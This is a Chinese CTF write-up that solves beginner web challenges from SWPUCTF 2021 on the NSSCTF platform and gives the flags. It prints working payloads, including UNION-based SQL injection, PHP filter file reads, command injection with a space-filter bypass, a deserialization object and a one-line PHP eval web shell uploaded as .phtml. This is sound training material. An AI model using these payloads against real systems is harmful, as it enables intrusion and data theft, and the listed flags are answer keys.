[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](http://pic.ttrar.cn/nice/%5bSWPUCTF%5d20.jpg)
[SWPUCTF] 2021 新生赛(NSSCTF刷题记录wp)
-
- [SWPUCTF 2021 新生赛]gift_F12
- [第五空间 2021]签到题
- [SWPUCTF 2021 新生赛]jicao
- [SWPUCTF 2021 新生赛]easy_md5
- [SWPUCTF 2021 新生赛]caidao
- [SWPUCTF 2021 新生赛]include
- [SWPUCTF 2021 新生赛]easyrce
- [SWPUCTF 2021 新生赛]easy_sql
- [第五空间 2021]WebFTP
- [SWPUCTF 2021 新生赛]babyrce
- [陇剑杯 2021]签到
- [SWPUCTF 2021 新生赛]Do_you_know_http
- [SWPUCTF 2021 新生赛]ez_unserialize
- [SWPUCTF 2021 新生赛]easyupload1.0
- [SWPUCTF 2021 新生赛]easyupload2.0
NSSCTF平台:https://www.nssctf.cn/
[SWPUCTF 2021 新生赛]gift_F12
直接查看源代码F12搜flag即可。
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/8e00c07e3e674f5b83050805a11efacd.png)
NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
[第五空间 2021]签到题
NSSCTF{welcometo5space}
[SWPUCTF 2021 新生赛]jicao
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
所以为满足if条件,输出flag,构造Payload:
get:json={"x":"wllm"}
post:id=wllmNB
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/ec2e9d0bf8294c4dbf596f689ad3ec9d.png)
NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}
[SWPUCTF 2021 新生赛]easy_md5
<?php highlight_file(__FILE__);include 'flag2.php';if (isset($_GET['name']) && isset($_POST['password'])){$name = $_GET['name'];$password = $_POST['password'];if ($name != $password && md5($name) == md5($password)){echo $flag;}else {echo "wrong!";}}
else {echo 'wrong!';
}
?>
这里就是md5碰撞了 这里要求a和b输入值不相同,md5加密后的值弱类型相等,就想到了0e的科学计数法
这里需要让password != name 又需要让他们的md5值相等,所以我们需要md5绕过 这里可以用bp和hackbar
QNKCDZO,s878926199a
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/f245b1bf16ad487191ce3a2cae2c0111.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/9de0bd9720754ed7b4f3225a02c7a39a.png)
NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}
[SWPUCTF 2021 新生赛]caidao
直接告诉了密码 蚁剑直接连 flag在根目录下面。
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/39b3b64468b9460f92ea56ae1872e5fd.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/f59d8f5474b8408f9fcab77d81dc3112.png)
NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}
[SWPUCTF 2021 新生赛]include
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/3c64cd3c89f647d0b2533f6c7f157580.png)
Payload:?file=php://filter/convert.base64-encode/resource=flag.php
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/abb158352129464d8e817997caf13039.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/9c3e698517774ceb8c48fe29d17b624c.png)
NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}
[SWPUCTF 2021 新生赛]easyrce
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/4cc6b62e01534f7989907b19ebe522f3.png)
?url=system("ls /"); #发现了 flllllaaaaaaggggggg
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/82b9cd6a7a824a23b3e5353a2cab162c.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/4003a187edd54e1ab50538fa0b02fc09.png)
NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}
[SWPUCTF 2021 新生赛]easy_sql
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/cd25d2ee7a4842e3afb59158d1382620.png)
这里告诉我们了传入的参数是wllm 发现有报错,说明存在注入点 存在字符型注入 用order by 查询字段数,查得字段数为3输入4就报错
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/0e393b4cbe844364a2c44e0881810d4e.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/66329a374f4e4a7b88dd42c86b9c58e7.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/1d98a20eb37a4d7e82c20e60a5fa3f9c.png)
?wllm=-1' union select 1,2,3 --+ ##-1 一个负数不存在的id值来触发报错
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/394c11ca04ff4a7fbcca4486887357e4.png)
-1' union select 1,2,database(); --+ ##爆破数据库
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/87043b561bf943c79e5a5b478d566cc1.png)
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+ #爆破表
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/b44347012b3a4efa90010288ef2687cc.png)
这里有两个表test_tb和users 将tables的字段替换成column字段先看test_tb
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/cde935678fa5425b9c5fbed4812e9533.png)
-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/5fd97b51857f41218428dfae5742b9cb.png)
NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}
[第五空间 2021]WebFTP
使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/186775c5f1b64457b95832a994f033d2.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/e55685755c4a4f1ea6c42546353d9288.png)
NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}
[SWPUCTF 2021 新生赛]babyrce
<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)
{include "../next.php";
}
elseecho "小饼干最好吃啦!";
?> 小饼干最好吃啦!
bp抓包改cookie值 admin=1 出现了rasalghul.php进行访问 然后又是代码审计
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/0e5c6ad2d19942b08eca88fda8ef4484.png)
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {$ip=$_GET['url'];if(preg_match("/ /", $ip)){die('nonono');}$a = shell_exec($ip);echo $a;
}
?>
这里是烧过空格 ?url=cat${IFS}/f*
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/a72d6d3fe9ba40b1a55b812687c7624f.png)
NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}
[陇剑杯 2021]签到
此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)。得到的flag请使用NSSCTF{}格式提交。
NSSCTF{http}
[SWPUCTF 2021 新生赛]Do_you_know_http
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/eb6ec5b0a09c49dea7cd6396579875a2.png)
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For:127.0.0.1 访问/secretttt.php即可得到flag。
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/f51cf5031a5b42639d9ba3cc4655c587.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/5186c74dc92843799f95b35eb6cb729a.png)
NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}
[SWPUCTF 2021 新生赛]ez_unserialize
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/92b6acd97da34e8f972ac720c559874f.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/db782c3b6d3749eebe1715ff9d1f7053.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/f2ddf9a5feb84cb2be8bc3635a079dd5.png)
<?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}$p = $_GET['p'];
unserialize($p);?>
这里的考点就是反序列 可以参考大佬文章:https://blog.csdn.net/solitudi/article/details/113588692
Payload:?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/7b24a60f96b64e17b168fe13f6582b44.png)
NSSCTF{1387617d-68fc-4c72-aef2-f6bbafc59ed3}
[SWPUCTF 2021 新生赛]easyupload1.0
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/e13a2f92a2d3443187620150241dbe02.png)
新建一个一句话木马<?php @eval($_POST['shell']);?>格式改为php然后抓包 使用phtml 然后使用WebSell工具连接 发现连接成功!!!
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/90e5f9114e4c4811a08eb5c3b0d88a81.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/a12edf4f53fa4e2e884933ea1be844a8.png)
然后这个FLAG是假的怎么提交都不对 发现.git提示 尝试写个phpinfo(); 🆗得到FLAG。
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/5c0bf94d9efe4956b67d2765e5813fe0.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/c008dcb3bed24fcbbd6f62ac2b59980e.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/2f4e1ac7a02846d3a6a60b2afff7f1c8.png)
NSSCTF{7022989b-6f80-433c-b625-0e3ab22c0803}
[SWPUCTF 2021 新生赛]easyupload2.0
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/fee2154951ba415f8127811be007d4b9.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/3a9b74e5615f446fbf194fb7bdd32739.png)
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/d9561fcba1b84e08a6554f48fc26c692.png)
NSSCTF{41784aaa-7609-4a3e-8c92-7d5ea8efb3a9}
![[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①](https://img-blog.csdnimg.cn/a085f20bd96945be8e5572d55425dba3.png)
🆗感谢大家观看 这篇就先到这里了,都是些比较入门的题目,希望对刚入门CTF想刷题的小伙伴有帮助感谢大家的支持!


